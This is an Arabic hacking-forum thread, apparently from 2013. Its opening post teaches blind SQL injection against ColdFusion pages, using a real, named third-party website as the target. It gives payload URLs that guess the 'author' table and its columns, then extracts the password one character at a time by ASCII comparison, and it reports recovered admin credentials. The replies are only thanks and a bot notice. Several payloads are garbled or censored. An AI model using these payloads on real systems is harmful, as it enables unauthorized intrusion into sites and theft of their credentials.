[ شرح ] cfm injection

الموضوع في '[ SQL-injection ]' بواسطة عبد الصمد, بتاريخ ‏7 يوليو 2013.

الوسوم:
حالة الموضوع:
مغلق
  1. عبد الصمد

    عبد الصمد Developer

    الأنتساب:
    ‏13 نوفمبر 2012
    المشاركات:
    38
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    8
    بسم الله الرحمن الرحيم

    والصلاة والسلام على رسوله الحبيب

    السلام عليكم

    اليوم راح نتكلم على حقن cfm وفك الغموض عنها

    هي اغلبها يعتمد على التخمين واغلب جداولها بتكون author وحقولها تكون user**** password
    ويتم استخراج المعلومات الي بالحقول بترجمة ascii

    معانا موقع فار تجارب لكن مسالم راح نطبق عليه درسنا



    كود PHP:
    http://www.forege.fr/content.cfm?id=15

    لو نضيفله الشفطه راح يضهر خطا يدل على انه فيه خطا برمجي في ملف content

    احنا راح نخمن باستعلام التالي


    كود PHP:
    and Len((select Count(*) from [user]))

    طلع خطا
    نجرب التخمينات المحتملة
    admin
    users
    login
    الى اخر الحديث

    الان نجرب جدول
    author راح نلاقي رجعت الصفحة بدون اخطاء وهدا يدل على انو الجدول صحيح


    كود PHP:
    www.forege.fr/content.cfm?id=15 
    and Len((select Count(*) from [author]))

    الان نخمن الحقول الي في جدول author

    نجرب user****
    password
    pass
    pwd

    فرضا نجرب
    user_n ame

    راح يطلع معانا خطا

    كود PHP:
    http://www.forege.fr/content.cfm?id=15
    and Len((select top 1 [user_****] from (select top 1 from (select top 1 from [authororder by 1t order by 1 desc)t)) 
    الان نبقى نخمن حتى ترجع الثفحة سليمة والي هي تدل على انو الحقل صحيح

    كود PHP:
    http://www.forege.fr/content.cfm?id=15
    and Len((select top 1 [user****] from (select top 1 from (select top 1 from [authororder by 1t order by 1 desc)t)) 
    كود PHP:
    http://www.forege.fr/content.cfm?id=15
    and Len((select top 1 [passwordfrom (select top 1 from (select top 1 from [authororder by 1t order by 1 desc)t)) 
    الان ناتي للاستخراج المعلومات بترجمة ascii

    كود PHP:
    ascii


    SP        32    
    !        33    
    "        34    
    #        35    
    $        36    
    %        37    
    &        38    
    `        39    
    (        40    
    )        41    
    *        42    
    +        43    
    ,        44    
    -        45    
    .        46    
    /        47    
    0        48    
    1        49    
    2        50    
    3        51    
    4        52    
    5        53    
    6        54    
    7        55    
    8        56    
    9        57    
    :        58    
    ;        59    
    <        60    
    =        61    
    >        62    
    ?        63    
    @        64    
    A        65    
    B        66    
    C        67    
    D        68    
    E        69    
    F        70    
    G        71    
    H        72    
    I        73    
    J        74    
    K        75    
    L        76    
    M        77    
    N        78    
    O        79    
    P        80    
    Q        81    
    R        82    
    S        83    
    T        84    
    U        85    
    V        86    
    W        87    
    X        88    
    Y        89    
    Z        90    
    [        91    
    \        92    
    ]        93    
    ^        94    
    _        95    
    `        96    
    a        97    
    b        98    
    c        99    
    d        100    
    e        101    
    f        102    
    g        103    
    h        104    
    i        105    
    j        106    
    k        107    
    l        108    
    m        109    
    n        110    
    o        111    
    p        112    
    q        113    
    r        114    
    s        115    
    t        116    
    u        117    
    v        118    
    w        119    
    x        120    
    y        121    
    z        122    
    {        123    
    |        124    
    }        125    
    ~        126    
    DEL        127
    الان نستخرج ونتنقل من

    كود PHP:
    http://www.forege.fr/content.cfm?id=15

    and asc(mid((select top 1 [passwordfrom (select top 1 from (select top 1 from [authororder by 1t order by 1 desc)t),1,1))>74 
    وتكون الترجمة خلف الاستعلام اي بمعنى اثح هنا

    كود PHP:
    ))>[COLOR="Red"]74[/COLOR
    ونتنقل لما نلاقي الحرف الاول ننتقل للثاني هنا

    كود PHP:
    ,[COLOR="Red"]1[/COLOR],1))> 
    الي باللون الاحمر

    كود PHP:
    ,[COLOR="Red"]2[/COLOR],1))>74 
    وهيك لحتى نجلب المعلومات

    انا حقنته قبل فتره وكان
    admin
    admin
     
    2 شخص معجب بهذا.
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. G3niUs.M4n

    G3niUs.M4n Developer

    الأنتساب:
    ‏14 مايو 2012
    المشاركات:
    58
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    جــــدهـ ~
    رد: cfm injection

    يعطيك العافية يالغالي
    هذي المواضيع إلي ندور عنها
    بطل + تم تقييمك
     
  4. G.e.r.n.a.s

    G.e.r.n.a.s Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    32
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    مبرمج
    الإقامة:
    قائمة الابداع
    رد: cfm injection

    السلام عليكم
    جعل والديك بالجنه .. مآتقصر​
     
  5. JORDAN 8

    JORDAN 8 DeveloPer Plus

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    133
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    رد: cfm injection

    يِعٌطِيِک الَعٌافُيِة :{1}:​
     
  6. AhMeD 23

    AhMeD 23 Developer

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    رد: cfm injection

    السلام عليكم ورحمة الله وبركاته
    جزاك الله الف خيير اخي الغالي
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة